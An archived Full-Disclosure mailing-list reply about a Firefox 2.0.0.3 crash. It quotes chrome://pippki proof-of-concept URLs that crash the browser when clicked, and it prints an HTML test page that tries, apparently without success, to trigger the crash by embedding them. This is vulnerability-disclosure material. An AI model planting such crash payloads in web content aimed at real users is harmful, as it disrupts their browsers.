[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Firefox 2.0.0.3 DoS crash
- To: carl hardwick <hardwick.carl@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Firefox 2.0.0.3 DoS crash
- From: Tõnu Samuel <tonu@xxxxxx>
- Date: Fri, 20 Apr 2007 19:25:30 +0300
On Thu, 2007-04-19 at 20:22 +0200, carl hardwick wrote:
> Firefox 2.0.0.3 DoS crash
>
> PoC:
> chrome://pippki/content/editcacert.xul
> chrome://pippki/content/editemailcert.xul
> chrome://pippki/content/editsslcert.xul
Works for me on Linux when clicking on such link.
Meanwhile I tried to embed it into webpage and did not work.
tonu@duo:~/Desktop> cat poc.html
<html>
<body>
<img src="chrome://pippki/content/editcacert.xul" />
<iframe src="chrome://pippki/content/editcacert.xul" ></iframe>
<object src="chrome://pippki/content/editcacert.xul"
type="text/html"></object>
<script src="chrome://pippki/content/editcacert.xul" ></script>
</body>
</html>
tonu@duo:~/Desktop>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/